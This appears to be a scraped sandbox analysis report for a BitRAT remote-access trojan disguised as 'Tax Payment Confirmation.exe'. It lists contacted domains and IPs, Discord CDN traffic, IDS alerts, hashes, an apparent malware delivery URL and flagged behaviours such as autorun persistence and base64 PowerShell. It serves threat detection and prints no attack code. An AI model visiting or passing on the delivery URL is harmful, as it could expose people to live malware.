2036	iexplore.exe	192.229.221.95:80	ocsp.digicert.com	EDGECAST	US	whitelisted
1740	Tax Payment Confirmation.exe	162.159.134.233:443	cdn.discordapp.com	CLOUDFLARENET	—	shared

DNS requests

Domain	IP	Reputation
gemmeco.com	68.178.145.254	unknown
bodaitziarymiguel.com	82.98.171.63	unknown
api.bing.com	13.107.5.80	whitelisted
www.bing.com	23.53.43.121 23.53.43.115 23.37.226.106	whitelisted
ctldl.windowsupdate.com	93.184.221.240	whitelisted
ocsp.digicert.com	192.229.221.95	whitelisted
cdn.discordapp.com	162.159.134.233 162.159.133.233 162.159.129.233 162.159.135.233 162.159.130.233	shared
r20swj13mr.microsoft.com	152.199.19.161	whitelisted
iecvlist.microsoft.com	152.199.19.161	whitelisted
crl3.digicert.com	192.229.221.95	whitelisted

Threats

PID	Process	Class	Message
1080	svchost.exe	Misc activity	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)
1740	Tax Payment Confirmation.exe	Misc activity	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
2736	Tax Payment Confirmation.exe	Misc activity	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
2760	Tax Payment Confirmation.exe	Misc activity	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
2888	Tax Payment Confirmation.exe	Misc activity	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
3196	Tax Payment Confirmation.exe	Misc activity	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)
2868	Tax Payment Confirmation.exe	Misc activity	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)

Add for printing

No debug info

General Info

http://gemmeco.com//wp-include/kkf.htm

02E44989D12F21BA9EE626A1CDE6F499

823437A1B8D0328CE9F15C1C9B65A03519E60019

DFC372DACD07C14C0F5ED4D0314873DF7E01FCD1117338DCC65C8C6D1B6B299D

3:N1KZAII2tKiGe2V2u:C+I8lfZ

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Changes the autorun value in the registry

BITRAT has been detected (YARA)

Drops the executable file immediately after the start

Create files in the Startup directory

SUSPICIOUS

Reads settings of System Certificates

The executable file from the user directory is run by the CMD process

Reads the Internet Settings

Starts CMD.EXE for commands execution

Starts POWERSHELL.EXE for commands execution

BASE64 encoded PowerShell command has been detected

Base64-obfuscated command line is found

Using PowerShell to operate with local accounts

Executable content was dropped or overwritten

Application launched itself

Connects to unusual port

INFO

The process uses the downloaded file

Reads Environment values

Reads the machine GUID from the registry

Application launched itself

Drops the executable file immediately after the start

Checks supported languages

Reads the computer name

Creates files or folders in the user directory

Executable content was dropped or overwritten

Malware configuration

BitRat

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings